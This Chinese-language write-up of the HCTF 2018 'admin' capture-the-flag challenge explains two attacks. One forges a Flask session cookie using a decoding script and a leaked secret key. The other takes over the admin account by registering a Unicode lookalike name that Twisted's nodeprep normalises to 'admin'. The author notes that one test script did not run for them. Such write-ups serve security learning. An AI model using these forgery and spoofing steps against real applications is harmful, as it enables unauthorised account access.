[HCTF 2018]admin 1

考点：

 1. flask session伪造
 2. Unicode欺骗

先注册一个账号，然后登录进入chang_password页面看源代码，里面给了我们一个网址，进去下载一下

一、flask session伪造

了解flask session伪造

在传统PHP开发中，$_SESSION变量的内容默认会被保存在服务端的一个文件中，通过一个叫“PHPSESSID”的Cookie来区分用户。这类session是“服务端session”，用户看到的只是session的名称（一个随机字符串），其内容保存在服务端。

而flask中session是存储在客户端cookie中的，也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是，签名的作用是防篡改，而无法防止被读取。而flask并没有提供加密操作，所以其session的全部内容都是可以在客户端读取的，

我觉得大概意思就是，传统的php开发，session是保存在服务端我们看不到改不了，
而flask的session是保存在客户端的cookie中，我们可以看到，并且flask仅仅只对数据签名，
相当于加个身份证号码，并没有进行加密，虽然没有加密，但我们要进行伪造还要有SECRET_KEY，
这个就相当于身份证号码了。

想要细致了解的可要参考目录下的链接中看。

解题步骤：

我们登录的完可看到自己的session

把它复制下来用解密脚本解密（脚本出处：p佬）

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

解密完后我们就可以清楚的看到session中的内容和构造了,其中有个token，咱们了解一下token的生成方式

生成方式（ 内部配置的私钥+有效期+用户的id ）

有效期+用户的id,我们只要登录了就会自带，重点是这个私钥，而这个私钥，它在config.py中告诉我们了“ckj123”。这个私钥我感觉有点类似身份证号，不管你人名字怎么改，身份证号码变不了。

而在index.html中已经告诉我们只有session[‘name’] == 'admin’时才能拿到flag，所以我们就把解密后的name值改为admin呗,最后带上SECRET_KEY在加密一下呗

//index.html
{% include('header.html') %}
{% if current_user.is_authenticated %}
<h1 class="nav">Hello {{ session['name'] }}</h1>
{% endif %}
{% if current_user.is_authenticated and session['name'] == 'admin' %}
<h1 class="nav">hctf{xxxxxxxxx}</h1>
{% endif %}
<!-- you are not admin -->
<h1 class="nav">Welcome to hctf</h1>

{% include('footer.html') %}

利用加密脚本和源码中给的SECRET_KEY加密一下即可

python flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'1e64fd62946046b5c27b0e0c57aebab558b13043a87ea1ae8e5cb986426fa3d9187149035cc376882e27bc09284eefa41b41c22e2d02facaf4a46ddbf56226ea', 'csrf_token': b'52fc8bb5432576bfc1c7f05f7c0b8691664d8478', 'image': b'almy', 'name': 'admin', 'user_id': '10'}"

把我们利用SECRET_key加密生成的session带入,可以抓包改值。

go一下，拿到flag

二、Unicode欺骗

路由中有一个strlower函数，是用来改字母小写，并且登录，注册改密码中都有此函数



都是用strlower()来转小写，而python有转小写函数lower()，看一下strlower()

def strlower(username):
    username = nodeprep.prepare(username)
    return username

问题在nodeprep.prepare函数，在requirements.txt文件中发现Twisted==10.2.0，而最新版本要远大于他，所以应该会有漏洞，我们测一下有什么区别。

from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep

def strlower(name):
	str = nodeprep.prepare(name)
	return str
	
print (u'\u1d2c\u1d30\u1d39\u1d35\u1d3A')
print (strlower(u'\u1d2c\u1d30\u1d39\u1d35\u1d3A'))
print (strlower(strlower(u'\u1d2c\u1d30\u1d39\u1d35\u1d3A')))
//但我这边编译有问题，暂不清楚在哪。

可以看到第一次为ᴬᴰᴹᴵᴺ，对应着我们注册的时候，第二次为ADMIN，对应着我们改登录时，第三次就变为admin，对应着改密码后重登时，此时就可以看到flag了。

参考：

p师傅的客户端 session 导致的安全问题
Python Web之flask session&格式化字符串漏洞
小白白@